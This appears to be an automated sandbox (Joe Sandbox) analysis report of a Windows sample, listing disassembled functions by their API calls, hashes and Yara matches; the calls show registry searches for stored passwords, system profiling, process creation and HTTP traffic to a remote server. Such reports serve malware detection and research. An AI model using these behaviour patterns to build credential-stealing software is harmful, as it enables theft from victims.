                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D29927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02D20DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02D29948
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02D20FC1
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D20FCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                    • String ID:
                                                                                    • API String ID: 1395395982-0
                                                                                    • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                                                    • Instruction ID: eb2ff12f2a8a1fd8aba087575ee1b9afd4f5e532f48fc9463542bfa569dd869d
                                                                                    • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                                                    • Instruction Fuzzy Hash: 3E8173B5540228ABCB14EBA0DD55FED733AEF64708F4041A9A30666181EF746F8CCF69
                                                                                    Function 02D20CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • memset.MSVCRT ref: 02D20E83
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20E9C
                                                                                    • lstrcat.KERNEL32(?,00420D7C), ref: 02D20EAE
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20EC4
                                                                                    • lstrcat.KERNEL32(?,00420D80), ref: 02D20ED6
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20EEF
                                                                                    • lstrcat.KERNEL32(?,00420D84), ref: 02D20F01
                                                                                    • lstrlen.KERNEL32(?), ref: 02D20F0E
                                                                                    • memset.MSVCRT ref: 02D20F34
                                                                                    • memset.MSVCRT ref: 02D20F48
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D29927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02D20DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02D29948
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02D20FC1
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D20FCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                    • String ID:
                                                                                    • API String ID: 1395395982-0
                                                                                    • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                                                    • Instruction ID: f7b6372da1bf565f6ba48547baa02418b656742cf726a47a12141662e2e70d8c
                                                                                    • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                                                    • Instruction Fuzzy Hash: 8B61A0B5500228ABCB14EBA0DD55FED733AEF64708F0041A9E70666181EE746F8CCF69
                                                                                    Function 02D14AE7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                      • Part of subcall function 02D14A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                      • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02D14B7C
                                                                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 02D14BA1
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D14D21
                                                                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 02D1504F
                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02D1506B
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02D1507F
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02D150B0
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D15114
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D1512C
                                                                                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D14D7C
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D15136
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                    • String ID:
                                                                                    • API String ID: 2402878923-0
                                                                                    • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                                                    • Instruction ID: c6c95f754425588f7ab3e67cd48afeb7e6b34ab77d26e0df9514999c18067318
                                                                                    • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                                                    • Instruction Fuzzy Hash: 0B120D76910228EACB15EB90DD91FEEB37AEF64704F504199A10672690EF742F8CCF61
                                                                                    Function 02D164E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                      • Part of subcall function 02D14A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                      • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02D16548
                                                                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 02D1656A
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D1659C
                                                                                    • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D165EC
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02D16626
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02D16638
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02D16664
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02D166D4
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D16756
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D16760
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D1676A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3074848878-0
                                                                                    • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                                                    • Instruction ID: cae13be36d6458997da5fd77148582edaadc7a2079683e5c145733ea24d304d2
                                                                                    • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                                                    • Instruction Fuzzy Hash: D0715D75A40218EBDF24DFA0DC48BEE7779EF44704F104199E10A6B690DBB4AE88CF91
                                                                                    Function 02D29277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02D292D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateGlobalStream
                                                                                    • String ID:
                                                                                    • API String ID: 2244384528-0
                                                                                    • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                                                    • Instruction ID: 96e74743658be0de6c415780994231d34519cd4771814f738d4bcfff03c5d893
                                                                                    • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                                                    • Instruction Fuzzy Hash: 9E710BB9A40218ABDB14DFE4DD94FEEB7B9FF58304F108108F505A7290DB34A905CB61
                                                                                    Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                                                    • memset.MSVCRT ref: 0041716A
                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                                                    Strings
                                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                                                    • sA, xrefs: 004172AE, 00417179, 0041717C
                                                                                    • sA, xrefs: 00417111
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenProcesslstrcpymemset
                                                                                    • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                    • API String ID: 224852652-2614523144
                                                                                    • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                                                    • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                                                    • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                                                    • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                                                    Function 02D27767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D277A9
                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D277E6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2786A
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D27871
                                                                                    • wsprintfA.USER32 ref: 02D278A7
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                    • String ID: :$C$\$B
                                                                                    • API String ID: 1544550907-183544611
                                                                                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                    • Instruction ID: 9c0a16c952575d069cddceb950254be6bce0ed4d2b051186c1f758f345ebbfb0
                                                                                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                    • Instruction Fuzzy Hash: EE416EB1D40268EBDB10DF94CC45BEEBBB9EF58704F000199E505A7380D775AE88CBA5
                                                                                    Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                                                      • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                                                      • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                                                      • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                                                      • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                                                      • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                                                    • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                                                    • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                                                    • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                                                    • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                                                    • task.LIBCPMTD ref: 004076FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                    • String ID: :
                                                                                    • API String ID: 3191641157-3653984579
                                                                                    • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                                                    • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                                                    • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                                                    • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                                                    Function 02D21612 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrcpy.KERNEL32(?,?), ref: 02D21642
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                      • Part of subcall function 02D294C7: StrStrA.SHLWAPI(?,?), ref: 02D294D3
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D2167E
                                                                                      • Part of subcall function 02D294C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 02D294F7
                                                                                      • Part of subcall function 02D294C7: lstrlen.KERNEL32(?), ref: 02D2950E
                                                                                      • Part of subcall function 02D294C7: wsprintfA.USER32 ref: 02D2952E
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D216C6
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D2170E
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D21755
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D2179D
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D217E5
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D2182C
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D21874
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                    • strtok_s.MSVCRT ref: 02D219B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 4276352425-0
                                                                                    • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                                                    • Instruction ID: 5adb693a1631ae563ace033cdde137963ac0a72ef897c7074d63f95a382299f2
                                                                                    • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                                                    • Instruction Fuzzy Hash: B47155B595012CABCB14EBA0DD98EEE737AEF74304F044598A10DA6240EE759F89CF71
                                                                                    Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00407314
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                                                    • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                                                      • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                                                    • task.LIBCPMTD ref: 00407555
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                    • String ID: Password
                                                                                    • API String ID: 2698061284-3434357891
                                                                                    • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                                    • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                                                    • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                                    • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                                                    Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02E39968,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02E39968,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                                                    • __aulldiv.LIBCMT ref: 00418172
                                                                                    • __aulldiv.LIBCMT ref: 00418180
                                                                                    • wsprintfA.USER32 ref: 004181AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                    • String ID: %d MB$@
                                                                                    • API String ID: 2886426298-3474575989
                                                                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                    • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                                                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                    • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                                                    Function 02D16307 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                      • Part of subcall function 02D14A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                      • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 02D16376
